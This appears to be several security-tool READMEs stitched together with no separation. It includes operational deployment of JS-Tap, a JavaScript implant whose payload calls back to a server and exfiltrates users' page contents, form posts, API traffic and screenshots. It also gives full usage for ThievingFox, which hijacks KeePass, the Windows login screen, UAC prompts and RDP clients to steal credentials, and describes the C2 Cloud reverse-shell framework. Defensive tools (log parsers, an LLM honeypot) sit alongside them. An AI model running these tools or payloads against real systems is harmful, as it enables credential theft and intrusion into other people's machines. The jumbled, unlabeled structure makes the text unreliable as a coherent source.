source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt
run in debug/single thread mode:
python3 jsTapServer.py
run with gunicorn multithreaded (production use):
./jstapRun.sh
A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.
If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.
Note that on Mac I also had to install libmagic outside of python.
brew install libmagic
Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to run JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.
If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.
For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).
If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.
When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
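Since JS-Tap is a Flask application, the client IP logic described above can be pictured with a small sketch. This is an assumed illustration of the behavior, not the actual jsTapServer.py code:

```python
# Sketch of proxy-aware client IP resolution in a Flask app.
from flask import Flask, request

app = Flask(__name__)
PROXY_MODE = True  # example toggle; JS-Tap uses its own proxyMode setting

def client_ip() -> str:
    if PROXY_MODE:
        # Behind NGINX, trust the X-Forwarded-For header it sets.
        return request.headers.get("X-Forwarded-For", request.remote_addr)
    # Direct HTTPS mode: use the socket's source address.
    return request.remote_addr

@app.route("/whoami")
def whoami():
    return client_ip()
```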
The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.
To change the server port configuration see the last line of jsTapServer.py
app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')
Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.
A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.
At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.
Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
These configuration variables are in the initGlobals() function.
You need to configure the payload with the URL of the JS-Tap server it will connect back to.
window.taperexfilServer = "https://127.0.0.1:8444";
Set to either trap or implant. This is set with the variable:
window.taperMode = "trap";
or
window.taperMode = "implant";
Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.
window.taperstartingPage = "http://targetapp.com/somestartpage";
If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:
window.taperstartingPage = window.location.href;
Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.
This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.
window.taperTag = 'whatever';
Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.
window.taperTaskCheck = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;
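In other words, each check delay is the base delay plus a random value drawn between the jitter floor and ceiling. A quick sketch of that arithmetic, using the values above (illustrative only):

```python
# Sketch of the jittered task-check delay described above.
import random

task_check_delay = 5000     # base delay in ms
jitter_bottom    = -2000
jitter_top       = 2000

next_check_ms = task_check_delay + random.randint(jitter_bottom, jitter_top)
# next_check_ms falls anywhere between 3000 and 7000 ms
```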
true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.
window.taperexfilHTML = true;
true/false setting on whether to intercept a copy of all form posts.
window.taperexfilFormSubmissions = true;
Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode. In implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will rewrite the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.
window.monkeyPatchAPIs = true;
By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.
window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;
Login with the admin credentials provided by the server script on startup.
Clients show up on the left, selecting one will show a time series of their events (loot) on the right.
The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.
Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.
When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.
Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.
The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.
Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.
[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.
In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.
You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.
The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.
To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.
A few tools are included in the tools subdirectory.
A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.
At the top of the script is a numClients variable; set it to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a client.
numClients = 50
You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:
apiServer = "https://127.0.0.1:8444"
JS-Tap run using gunicorn scales quite well.
A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.
Run with:
python3 monkeyPatchLab.py
By default this will start the application running on:
https://127.0.0.1:8443
Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js
function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}
An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.
You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.
No longer working; used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.
@hoodoer
hoodoer@bitwisemunitions.dev
MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the /var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log, extracting critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.
Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper
This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis.

| Supported Log Formats List |
| --- |
| auth.log |
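MasterParser itself is a PowerShell script, but the kind of extraction it performs on auth.log can be illustrated with a short sketch. This is an assumption about the general parsing approach, not the tool's code:

```python
# Sketch: pull successful SSH logins out of auth.log.
import re

PATTERN = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)")

with open("/var/log/auth.log") as f:
    for line in f:
        m = PATTERN.search(line)
        if m:
            print(f"SSH login: user={m['user']} ip={m['ip']} "
                  f"method={m['method']}")
```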
If you wish to propose the addition of a new feature or log format, kindly submit your request by creating an issue. Click here to create a request
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
TCP Socket: Serving reverse TCP requests for enhanced functionality.
Nginx: Effortlessly routing traffic between web and backend systems.
Redis PubSub: Serving as a robust message broker for seamless communication.
Websockets: Delivering real-time updates to browser clients for enhanced user experience.
Postgres DB: Ensuring persistent storage for seamless continuity.
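To illustrate the message-broker role of Redis PubSub in an architecture like this, here is a minimal sketch; the channel name and payload are hypothetical, not C2 Cloud's actual schema:

```python
# Sketch: relaying backdoor output through Redis PubSub.
import redis

r = redis.Redis()

# The TCP-socket side publishes output from a backdoor session...
r.publish("session:42:output", b"uid=0(root) gid=0(root)")

# ...while the web side subscribes and pushes it to the browser.
p = r.pubsub()
p.subscribe("session:42:output")
for message in p.listen():
    if message["type"] == "message":
        print(message["data"])  # forward to the websocket client here
        break
```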
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:
Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.
Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.
Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.
User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
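The detection style described above can be sketched with a few regexes. This is an illustrative assumption about the approach, not WLA-cli.py's actual rules:

```python
# Sketch: flag common attack patterns in web server log lines.
import re

SIGNATURES = {
    "XSS": re.compile(r"<script|%3Cscript", re.I),
    "LFI": re.compile(r"\.\./|%2e%2e%2f", re.I),
    "RFI": re.compile(r"=(https?|ftp)://", re.I),
}

with open("access.log") as f:
    for line in f:
        for attack, pattern in SIGNATURES.items():
            if pattern.search(line):
                print(f"[{attack}] {line.strip()}")
```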
This project is actively developed, and future features may include:
The tool only requires Python 3 at the moment.
After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. Simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t
Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h
LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other versions, and are not expected to work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have a HKCU
hive).
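For background, per-user COM hijacking boils down to planting an InprocServer32 value under the user's HKCU classes so it shadows the machine-wide entry; writing it under HKCR instead affects every user. A hedged sketch of that registry write follows; the CLSID and DLL path are placeholders, and this is not ThievingFox's code:

```python
# Sketch: per-user COM hijack via an HKCU InprocServer32 override (Windows only).
import winreg

CLSID = "{00000000-0000-0000-0000-000000000000}"      # placeholder CLSID
DLL_PATH = r"C:\Windows\Temp\ThievingFox\proxy.dll"   # placeholder path

key_path = rf"Software\Classes\CLSID\{CLSID}\InprocServer32"
with winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path) as key:
    # The default value points COM activation at the planted DLL.
    winreg.SetValueEx(key, "", 0, winreg.REG_SZ, DLL_PATH)
```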
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass module requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.
For applications that support poisoning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified in the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/output/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
TL;DR: Galah (/ษกษหlษห/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.
Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!
I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
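Galah is written in Go, but the per-port caching idea can be pictured with a tiny sketch: the cache key incorporates both the port and the request, so identical probes on different ports miss the cache. The key shape below is an assumption, not Galah's actual implementation:

```python
# Sketch: per-port response cache keying.
import hashlib

def cache_key(port: str, request_line: str) -> str:
    return hashlib.sha256(f"{port}|{request_line}".encode()).hexdigest()

# Same request, different ports -> different keys, so no cache hit.
assert cache_key("8080", "GET /.git/config") != cache_key("8888", "GET /.git/config")
```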
The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.
Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.
Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.
Support for Other LLMs.
config.yaml
file.
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v
[ASCII-art banner: GALAH]
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi
2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned
2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434
^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.
Here are some example responses:
% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>
JSON log record:
{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2
JSON log record:
